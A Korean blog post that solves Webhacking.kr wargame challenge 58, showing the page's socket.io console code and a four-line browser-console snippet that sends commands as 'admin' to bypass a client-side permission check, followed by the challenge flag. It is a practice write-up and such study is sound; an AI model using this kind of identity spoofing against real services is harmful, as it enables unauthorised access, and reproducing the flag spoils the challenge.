본문 바로가기
[웹해킹]/[Webhacking.kr]

[Webhacking.kr] 58번

by Hevton 2020. 11. 27.
반응형

 

명령어를 입력할 수 있는 창이 있다.

 

help를 입력해보면 총 4가지 명령어가 가능하다.

 

ls / help / flag / id

 

여기서 flag를 열어봐야하는데, 시도하면 아래와 같은 경고가 뜬다

permission denied... admin only!

그래 그럼 권한을 admin으로 바꿔보자.

 

소스보기를 하면 아래와 같다.

<!doctype html>
<html>
  <head>
    <title>USER Console</title>
    <style>
      * { margin: 0; padding: 0; box-sizing: border-box; }
      body { font: 13px Helvetica, Arial; }
      form { background: #000; padding: 3px; position: fixed; bottom: 0; width: 100%; }
      form input { border: 0; padding: 10px; width: 90%; margin-right: .5%; }
      form button { width: 9%; background: rgb(130, 224, 255); border: none; padding: 10px; }
      #messages { list-style-type: none; margin: 0; padding: 0; }
      #messages li { padding: 5px 10px; }
      #messages li:nth-child(odd) { background: #eee; }
    </style>
  </head>
  <body>
    <ul id="messages"></ul>
    <form action="">
      <input id="m" autocomplete="off" /><button>Send</button>
    </form>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.2.0/socket.io.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <script>
    $(function () {
      var username = "guest";
      var socket = io();
      $('form').submit(function(e){
        e.preventDefault();
        socket.emit('cmd',username+":"+$('#m').val());
        $('#m').val('');
        return false;
      });
      socket.on('cmd', function(msg){
        $('#messages').append($('<li>').text(msg));
      });
    });
    </script>
  </body>
</html>

여기서 봐야할건 스크립트부분. 저부분에서 소켓연결 io()와 소켓을 통해 데이터를 보내는 emit() 함수와 데이터를 받는 on()함수 세가지만 추출해서 명령문을 만든 뒤, 크롬의 개발자 도구 console에 입력해주면 된다.

var username = "admin";
var socket = io();
socket.emit('cmd',username+":flag");
socket.on('cmd', function(msg){console.log(msg);});

두둥

FLAG{do_you_know_about_darkhotel}

 

끄읕.

반응형

'[웹해킹] > [Webhacking.kr]' 카테고리의 다른 글

[Webhacking.kr] 60번  (0) 2020.11.29
[Webhacking.kr] 59번 + 멀티 바이트 취약점 정리  (0) 2020.11.28
[Webhacking.kr] 57번  (0) 2020.11.26
[Webhacking.kr] 56번  (0) 2020.11.25
[Webhacking.kr] 55번 & 나중에 다시 보기  (0) 2020.11.24

관련글

티스토리툴바